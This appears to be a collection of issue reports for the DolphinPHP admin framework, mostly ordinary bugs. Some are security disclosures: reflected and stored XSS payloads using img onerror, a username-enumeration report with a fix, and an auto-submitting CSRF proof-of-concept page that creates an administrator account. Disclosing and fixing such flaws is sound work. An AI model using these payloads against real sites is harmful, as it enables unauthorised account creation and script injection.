
dolphinphp's Issues

Bug report: quick add does not hash the password

/application/admin/controller/Admin.php
In the add method, fields of type password are saved without being hashed. Suggest adding:

    // Hash every form item declared with type 'password' before saving
    foreach ($form['items'] as $item) {
        if ($item[0] == 'password') {
            $data[$item[1]] = Hash::make((string) $data[$item[1]]);
        }
    }

Database backup fails

If a view has been created, it is shown in the list.
But the backup logic should only apply to tables; if a view is selected for backup, the backup fails.

Admin login page has a username enumeration vulnerability

1. Log in with the admin account and add a user named test.
2. Logging in with the test account and a wrong password shows "account or password incorrect".
3. Logging in with a nonexistent account (test1 here) shows "user does not exist or is disabled".
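A login check that avoids the difference described above, written as an added example (not DolphinPHP's own code): every failure path returns the same message and still runs password_verify(), so neither the text nor the response time tells the caller whether the username exists. The user table and hashes are constructed inline.

```php
<?php
// Added example, not DolphinPHP code: one generic failure message for every
// cause (unknown user, disabled user, wrong password), plus a password_verify()
// call on every path so timing does not reveal whether the username exists.

// Constructed stand-in for the admin user table: username => record.
$users = [
    'test' => [
        'status'   => 1,
        'password' => password_hash('correct-horse-battery', PASSWORD_DEFAULT),
    ],
];

// Hash of a random string, compared against when no such user exists so the
// verification costs the same as for a real account.
$dummyHash = password_hash(bin2hex(random_bytes(16)), PASSWORD_DEFAULT);

function attemptLogin(array $users, string $dummyHash, string $username, string $password): array
{
    $user = $users[$username] ?? null;
    $hash = $user['password'] ?? $dummyHash;

    // Always run the expensive check, even when the account is missing or disabled.
    $passwordOk = password_verify($password, $hash);
    $accountOk  = $user !== null && (int) $user['status'] === 1;

    if ($passwordOk && $accountOk) {
        return ['ok' => true, 'msg' => 'Login successful'];
    }

    // Record the precise reason server-side only; the client sees one message.
    $reason = $user === null ? 'no such user' : (!$accountOk ? 'disabled' : 'bad password');
    error_log(sprintf('login failed for "%s": %s', $username, $reason));

    return ['ok' => false, 'msg' => 'Account or password incorrect'];
}

// The two failing calls below produce the identical message.
var_dump(attemptLogin($users, $dummyHash, 'test',  'wrong')['msg']);   // existing user, wrong password
var_dump(attemptLogin($users, $dummyHash, 'test1', 'wrong')['msg']);   // unknown user
var_dump(attemptLogin($users, $dummyHash, 'test',  'correct-horse-battery')['ok']);
```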

Hello, a question about a table built with zbuild: searching for a keyword while the current page is not page 1 returns no results

Example:
Build the current table with zbuild, page to page 6 (any page after the first will do), then search for any keyword; nothing is found. If page=xxx in the URL is changed to page=1, the search works.

This is a small bug, right? When a search is performed, the current page has to be reset to 1 for there to be results. How should this be handled???

The setTrigger listener should add a clear control

Sometimes toggling show/hide should not clear the values of the hidden form items.

    /**
     * Set a trigger
     * @param string $trigger  Name of the form item that triggers; currently supports select (single choice), text and radio
     * @param string $values   Value(s) that fire the trigger
     * @param string $show     Name of the form item(s) to show when triggered; plain linkage, range, drag-sort and static text are not supported yet
     * @param bool   $is_clear Whether to clear the values of the hidden form items; cleared by default
     * @author 蔡伟明
     * @return $this
     */
    public function setTrigger($trigger = '', $values = '', $show = '', $is_clear = true)


DolphinPHP v1.5.1 vulnerability, Reflected Cross Site Scripting (XSS)

version: 1.5.1
Vulnerability location: Background -> System -> system function -> Attachment management.
Background -> System -> system function -> system log.
Background -> System -> system function -> Behavior management.
Affected parameter: search_field
payload: test"><img src=x onerror=alert("xss")>

Add User function with CSRF vulnerability

The Add User form has no CSRF token.
A hacker can use it to add a new user.
Tricking an administrator into opening this page:

<html>
  <body>
    <form action="http://192.168.52.130/public/admin.php/user/index/add.html" method="POST" id="test">
      <input type="hidden" name="username" value="hackertest" />
      <input type="hidden" name="nickname" value="hackertest" />
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="email" value="qq&#64;aixinwei&#46;wang" />
      <input type="hidden" name="password" value="testtest" />
      <input type="hidden" name="mobile" value="13311111111" />
      <input type="hidden" name="avatar" value="" />
      <input type="hidden" name="status" value="1" />
    </form>
    <script>
      var f = document.getElementById("test");
      f.submit();
    </script>
  </body>
</html>

Suggestion for repairing: add a CSRF token to the HTML form.
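One way to implement the suggested repair, as an added example (not DolphinPHP's own code): a session-bound token rendered into the form and verified with a constant-time comparison before the add handler touches the user table. The field name _token and the handler layout are assumptions.

```php
<?php
// Added example, not DolphinPHP code: a session-bound CSRF token for the
// add-user form. A cross-site page like the one above cannot read the victim's
// session, so it cannot supply a valid token and the handler rejects the POST.
session_start();

// Create the token once per session with a CSPRNG and reuse it for later forms.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to render inside the add-user <form>. The field name _token is
// an assumption; the value is escaped even though hex needs no escaping.
function csrfField(): string
{
    return '<input type="hidden" name="_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time check of the submitted token against the session copy;
// a missing or non-string token fails closed.
function csrfValid(array $post): bool
{
    $stored = $_SESSION['csrf_token'] ?? '';
    $sent   = $post['_token'] ?? null;
    return $stored !== '' && is_string($sent) && hash_equals($stored, $sent);
}

// In the add handler, verify before any user record is created.
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrfValid($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // ... validate input and create the user here ...
}

// Rendering the form: the token travels with the page, not with the cookie.
echo '<form action="/admin.php/user/index/add.html" method="POST">',
     csrfField(),
     '<input name="username"> ... <button type="submit">Add</button></form>';
```

As a complementary measure, the session cookie can be issued with the SameSite attribute (session_set_cookie_params() accepts a 'samesite' option since PHP 7.3), which keeps the browser from attaching it to the cross-site POST in the first place.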

DolphinPHP v1.5.1 has a vulnerability, Stored Cross Site Scripting (XSS)

version: 1.5.1
Vulnerability location: Background -> System -> system function -> configuration management.
Add a new configuration, and insert the payload in the configuration title.
payload: t"><img src=x onerror=alert(1)>
Save and refresh the page. A window pops up.
payload: <img src=x onerror=alert("xss")>
When you visit this page, a pop-up window appears.

Auto-completion (setIpAttr) conflicts with the zbuilder:table callback

    public function setIpAttr()
    {
        return request()->ip();
    }

    return ZBuilder::make('table')
        ->addColumns([
            ['ip', 'ip地址', 'callback', function ($value) {
                // $value cannot be retrieved here
                return 456;
            }],
        ])
        ->fetch();

Image upload bug

When a thumbnail is configured and the uploaded image is large (tested with 894K and 2.1M images), the upload fails; reproduction rate 100%.

config loading adjustment

In the behavior layer, config is executed by default in app_begin, which makes dynamically set config ineffective.

The scenario: if watermarking is enabled in the admin backend but some uploads do not need a watermark, I can dynamically turn off upload_thumb_water, but after the behavior runs, every time attachment is reached the configuration is re-read, so config('upload_thumb_water', 0) has no effect.
